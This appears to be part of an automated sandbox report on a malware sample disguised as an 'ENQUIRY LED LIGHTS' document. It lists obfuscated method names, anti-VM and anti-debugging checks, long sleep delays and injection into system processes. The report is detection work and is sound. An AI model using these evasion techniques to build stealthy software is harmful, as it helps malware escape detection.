            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, tk9fVfH5iSssd1Iuq3.csHigh entropy of concatenated method names: 'Vt470ExZUO', 'uwf7e1CjJY', 'bGH7IAvE6e', 'xFY7XQ176P', 'gwA7YyP94N', 'JkQ7yFTWua', 'eKL7cYaC4T', 'BNb7iYoSVg', 'LRm7sOGUbZ', 'ufI7KXoBCH'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, MJqHXZggeHIDrjZqM8.csHigh entropy of concatenated method names: 'kdRdJpFpNP', 'ofwdDFRXhL', 'kVMdV5Tv9Z', 'K54dNNJZUR', 'eNwd6HXI4p', 'oFudMdQtok', 'SJld82xGE1', 'IwLd0DDlfc', 'tnodess885', 'vqGdCoHfpb'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, C6pYrh05IGfcUbyG3L.csHigh entropy of concatenated method names: 'pOZRIZkaV1', 'Dq0RXTTOTs', 'S42RL1BYLH', 'H0bRYbR3Ar', 'Q9fRhUofC0', 'FxuRyFcETj', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, awBbSNVR1ZSedZn6vX.csHigh entropy of concatenated method names: 'jSxmS0WHJH', 'RYVmaCviaC', 'xOVm41xh3A', 'fhPmvMDT2g', 'AfPmUErPWT', 'tFkmkwqdCk', 'Ubemr9qT3i', 'tK3Rb3QeG4', 'LPERfY0ZQl', 'FxiRpqtRCe'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, pGriIKtV0meYym5cfu.csHigh entropy of concatenated method names: 'mcXWfBOLOC', 'mwMWqmRUgV', 'QD2RTQOIpl', 'koxRSa7IVS', 'zPvWKD7iEd', 'PeRWjR3jmP', 'kf4WGpdZeJ', 'XZmWhKffgO', 'fMQWPLtd5y', 'RGEWlC3hyZ'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, zCdZB2IyVxidTBWpWC.csHigh entropy of concatenated method names: 'PAbUhdTVyo', 'poUUP5qYH7', 'tbnUlV8KDa', 'tcqUtiTeWH', 'mioUQpgilx', 'po5UESVjen', 'ekrUb2LgdE', 'IgVUfxDkoc', 'IsvUpnxKJy', 'w7ZUqXiTOk'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, P9I1LQRf00da55U6ir.csHigh entropy of concatenated method names: 'Fr3awjqXOM', 'llMavBwPKk', 'YdaaUjRbkw', 'LgMaoAhQM6', 'EahakSW4ES', 'wSSarM8maF', 'BWDadClimu', 'ymxagewSGP', 'rJqa3mcGqy', 'VnaaFkiivw'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, VoGKZkmcFQfRYiAx9v.csHigh entropy of concatenated method names: 's3PrwrEOZd', 'jbPrUj5TW7', 'EosrkHiGK0', 'CSBrdk4yN4', 'WFyrgdGgX4', 'b1SkQ4yo4S', 'i2YkEkiBkO', 'AhxkbtRrCf', 'SuokfDbyBa', 'pVkkpAJWLq'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, Fnk7iidicNbWyXGiQpt.csHigh entropy of concatenated method names: 'bRsmJ705d2', 'eg6mDDCufo', 'LqXmVXvFy7', 'F1ImNK6XuC', 'qqDm6bHG9x', 'LLCmMwwDNN', 'zV2m8WtiR1', 'L8im0FIkKk', 'LBxme6ZtsY', 'gktmCvH7Xb'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, ta0jagdddddL9UFCV5V.csHigh entropy of concatenated method names: 'ToString', 'M9dBa6SCtb', 'rSGB42C2dH', 'kaUBwaaKPy', 'LLrBvWNplo', 'APkBUcDALx', 'E07Bod73jP', 'zQWBkE2hVC', 'ym3DAdR8Q2RPZsy13ES', 'yrlG2ERwUT4tUlJYW6L'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, JjXEOud2tpryD05P0iy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hrgBhXOPkm', 'lccBPTOSMH', 'fUqBlywT2W', 'XpIBtj2Nlv', 'N53BQmkMXO', 'CJYBEETh23', 'jNIBbQA5vJ'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, gLSqvkwK26E24TpbqO.csHigh entropy of concatenated method names: 'dV6VxPgxH', 'lh3NP17mM', 'Xl0MADqPh', 'Rwk8ysWUJ', 'TFneD4lZY', 'T1AChpiKS', 'LkNOKp8edTC8VcJh2P', 'vpcuNJwSjCGnMPTppF', 'p4AR5qm1e', 'h6pBisSBS'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, jdZGL2oOZSYUKaCTD5.csHigh entropy of concatenated method names: 'i3dRvW9cvJ', 'fOGRUu7j5d', 'gijRoPtdgO', 'lelRkrPtHW', 'PDeRrZh7q0', 't17RdARKVx', 'mN7Rgha0sj', 'kpYR3qYs3n', 'OnaRFWKy0u', 'jZkROO4Im8'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, HYnt06Oc4HTad2fcJ8.csHigh entropy of concatenated method names: 'bcYdvV6nYa', 'XeGdofkAAY', 'RHXdr59f6E', 'zK2rq3BGGn', 'nparzakC6r', 'NkldTeUi6b', 'XgddSIBcqq', 'jNRdHYM2fs', 'K76dabiFdO', 'ESYd43laRo'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, sYronPkJY2qAxmeuZo.csHigh entropy of concatenated method names: 'Dispose', 'WeeSpdh2i7', 'SCKHXeUQ6g', 'fnc11rBEvq', 'JRmSqF4hhM', 'lFhSzOUyld', 'ProcessDialogKey', 'lpTHTOR9pN', 'ut8HSWsGG9', 'uXNHHIRYVf'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, nLR3bA80hJ4wspDwYO.csHigh entropy of concatenated method names: 'ffySd8hM0Y', 'HiOSgk6OuU', 'aS7SFRKc1d', 'wZFSOkMuqb', 'U68SxWTnEC', 'KwFS5Rojta', 'fFMuexB9TWqlJvu7Jo', 'st9qdyc4jMVkvrHf9X', 'lbeLZtMS3SAn02kyWU', 'WrJSSYKtVF'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, j2vSbIzuip2Doe0AA1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LxQm7vXSZ6', 'DrTmx2LX6o', 'w0km5q8Vfx', 'TFmmWDHG68', 'LiAmRJqrNv', 'ygdmmQDebb', 'x3dmBBCnAu'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, fcVU1grtFVPAvdmFEO.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'mvNHp1HGsV', 'Xr4HqlmIeT', 'gXlHzqJNEV', 'AlqaT3R3jC', 'FTwaSVftyq', 'gbiaHMcZlI', 'spaaagIUDH', 'XswJhdlDx8iEv1BAnFG'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, g78YtbvSAnGYotjs65.csHigh entropy of concatenated method names: 'bq5oNFZL2R', 'gvmoMndr5M', 'O5eo0RhYWK', 'OoxoeHWZjs', 'R1aox7D7fu', 'J0Wo5u4Vdy', 'A4ioWNc7el', 'oPboRmSWdS', 'NQ0omvWIpd', 'lUXoBKnwPF'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, KIl1hf45qAvMav4dpU.csHigh entropy of concatenated method names: 'mEUxs0u7FT', 'uo3xjDjvI8', 'K3exhF0HYq', 'V8GxPoZf2k', 'dcJxXv9w3r', 'VOYxLevlP1', 'hVrxYTBv2v', 'YsixyKiofY', 'pFwx22sQa1', 'oGPxc0fGKg'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, tk9fVfH5iSssd1Iuq3.csHigh entropy of concatenated method names: 'Vt470ExZUO', 'uwf7e1CjJY', 'bGH7IAvE6e', 'xFY7XQ176P', 'gwA7YyP94N', 'JkQ7yFTWua', 'eKL7cYaC4T', 'BNb7iYoSVg', 'LRm7sOGUbZ', 'ufI7KXoBCH'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, MJqHXZggeHIDrjZqM8.csHigh entropy of concatenated method names: 'kdRdJpFpNP', 'ofwdDFRXhL', 'kVMdV5Tv9Z', 'K54dNNJZUR', 'eNwd6HXI4p', 'oFudMdQtok', 'SJld82xGE1', 'IwLd0DDlfc', 'tnodess885', 'vqGdCoHfpb'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, C6pYrh05IGfcUbyG3L.csHigh entropy of concatenated method names: 'pOZRIZkaV1', 'Dq0RXTTOTs', 'S42RL1BYLH', 'H0bRYbR3Ar', 'Q9fRhUofC0', 'FxuRyFcETj', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, awBbSNVR1ZSedZn6vX.csHigh entropy of concatenated method names: 'jSxmS0WHJH', 'RYVmaCviaC', 'xOVm41xh3A', 'fhPmvMDT2g', 'AfPmUErPWT', 'tFkmkwqdCk', 'Ubemr9qT3i', 'tK3Rb3QeG4', 'LPERfY0ZQl', 'FxiRpqtRCe'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, pGriIKtV0meYym5cfu.csHigh entropy of concatenated method names: 'mcXWfBOLOC', 'mwMWqmRUgV', 'QD2RTQOIpl', 'koxRSa7IVS', 'zPvWKD7iEd', 'PeRWjR3jmP', 'kf4WGpdZeJ', 'XZmWhKffgO', 'fMQWPLtd5y', 'RGEWlC3hyZ'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, zCdZB2IyVxidTBWpWC.csHigh entropy of concatenated method names: 'PAbUhdTVyo', 'poUUP5qYH7', 'tbnUlV8KDa', 'tcqUtiTeWH', 'mioUQpgilx', 'po5UESVjen', 'ekrUb2LgdE', 'IgVUfxDkoc', 'IsvUpnxKJy', 'w7ZUqXiTOk'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, P9I1LQRf00da55U6ir.csHigh entropy of concatenated method names: 'Fr3awjqXOM', 'llMavBwPKk', 'YdaaUjRbkw', 'LgMaoAhQM6', 'EahakSW4ES', 'wSSarM8maF', 'BWDadClimu', 'ymxagewSGP', 'rJqa3mcGqy', 'VnaaFkiivw'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, VoGKZkmcFQfRYiAx9v.csHigh entropy of concatenated method names: 's3PrwrEOZd', 'jbPrUj5TW7', 'EosrkHiGK0', 'CSBrdk4yN4', 'WFyrgdGgX4', 'b1SkQ4yo4S', 'i2YkEkiBkO', 'AhxkbtRrCf', 'SuokfDbyBa', 'pVkkpAJWLq'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, Fnk7iidicNbWyXGiQpt.csHigh entropy of concatenated method names: 'bRsmJ705d2', 'eg6mDDCufo', 'LqXmVXvFy7', 'F1ImNK6XuC', 'qqDm6bHG9x', 'LLCmMwwDNN', 'zV2m8WtiR1', 'L8im0FIkKk', 'LBxme6ZtsY', 'gktmCvH7Xb'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, ta0jagdddddL9UFCV5V.csHigh entropy of concatenated method names: 'ToString', 'M9dBa6SCtb', 'rSGB42C2dH', 'kaUBwaaKPy', 'LLrBvWNplo', 'APkBUcDALx', 'E07Bod73jP', 'zQWBkE2hVC', 'ym3DAdR8Q2RPZsy13ES', 'yrlG2ERwUT4tUlJYW6L'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, JjXEOud2tpryD05P0iy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hrgBhXOPkm', 'lccBPTOSMH', 'fUqBlywT2W', 'XpIBtj2Nlv', 'N53BQmkMXO', 'CJYBEETh23', 'jNIBbQA5vJ'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, gLSqvkwK26E24TpbqO.csHigh entropy of concatenated method names: 'dV6VxPgxH', 'lh3NP17mM', 'Xl0MADqPh', 'Rwk8ysWUJ', 'TFneD4lZY', 'T1AChpiKS', 'LkNOKp8edTC8VcJh2P', 'vpcuNJwSjCGnMPTppF', 'p4AR5qm1e', 'h6pBisSBS'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, jdZGL2oOZSYUKaCTD5.csHigh entropy of concatenated method names: 'i3dRvW9cvJ', 'fOGRUu7j5d', 'gijRoPtdgO', 'lelRkrPtHW', 'PDeRrZh7q0', 't17RdARKVx', 'mN7Rgha0sj', 'kpYR3qYs3n', 'OnaRFWKy0u', 'jZkROO4Im8'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, HYnt06Oc4HTad2fcJ8.csHigh entropy of concatenated method names: 'bcYdvV6nYa', 'XeGdofkAAY', 'RHXdr59f6E', 'zK2rq3BGGn', 'nparzakC6r', 'NkldTeUi6b', 'XgddSIBcqq', 'jNRdHYM2fs', 'K76dabiFdO', 'ESYd43laRo'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, sYronPkJY2qAxmeuZo.csHigh entropy of concatenated method names: 'Dispose', 'WeeSpdh2i7', 'SCKHXeUQ6g', 'fnc11rBEvq', 'JRmSqF4hhM', 'lFhSzOUyld', 'ProcessDialogKey', 'lpTHTOR9pN', 'ut8HSWsGG9', 'uXNHHIRYVf'
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: ENQUIRY LED LIGHTS.pif.exe PID: 7288, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: CE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: 26D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: D20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: 77D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: 87D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: 8990000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: 7070000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: 9C20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: AC20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: BC20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F5096E rdtsc 3_2_02F5096E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeWindow / User API: threadDelayed 3772Jump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeWindow / User API: threadDelayed 6199Jump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe TID: 7308Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe TID: 7972Thread sleep count: 3772 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe TID: 7972Thread sleep time: -7544000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe TID: 7972Thread sleep count: 6199 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe TID: 7972Thread sleep time: -12398000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe TID: 8024Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032AC410 FindFirstFileW,FindNextFileW,FindClose,8_2_032AC410
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: SearchFilterHost.exe, 00000008.00000002.2975886564.000000000344A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2577102278.00000161BC1CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2976367299.0000000000C3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F5096E rdtsc 3_2_02F5096E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00417F8F LdrLoadDll,3_2_00417F8F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00446B64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00446B64
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00448B5B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_00448B5B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F202E1 mov eax, dword ptr fs:[00000030h]3_2_02F202E1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F202E1 mov eax, dword ptr fs:[00000030h]3_2_02F202E1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F202E1 mov eax, dword ptr fs:[00000030h]3_2_02F202E1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A2C3 mov eax, dword ptr fs:[00000030h]3_2_02F1A2C3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A2C3 mov eax, dword ptr fs:[00000030h]3_2_02F1A2C3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A2C3 mov eax, dword ptr fs:[00000030h]3_2_02F1A2C3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A2C3 mov eax, dword ptr fs:[00000030h]3_2_02F1A2C3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A2C3 mov eax, dword ptr fs:[00000030h]3_2_02F1A2C3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F202A0 mov eax, dword ptr fs:[00000030h]3_2_02F202A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F202A0 mov eax, dword ptr fs:[00000030h]3_2_02F202A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA62A0 mov eax, dword ptr fs:[00000030h]3_2_02FA62A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA62A0 mov ecx, dword ptr fs:[00000030h]3_2_02FA62A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA62A0 mov eax, dword ptr fs:[00000030h]3_2_02FA62A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA62A0 mov eax, dword ptr fs:[00000030h]3_2_02FA62A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA62A0 mov eax, dword ptr fs:[00000030h]3_2_02FA62A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA62A0 mov eax, dword ptr fs:[00000030h]3_2_02FA62A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E284 mov eax, dword ptr fs:[00000030h]3_2_02F4E284
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E284 mov eax, dword ptr fs:[00000030h]3_2_02F4E284
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F90283 mov eax, dword ptr fs:[00000030h]3_2_02F90283
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F90283 mov eax, dword ptr fs:[00000030h]3_2_02F90283
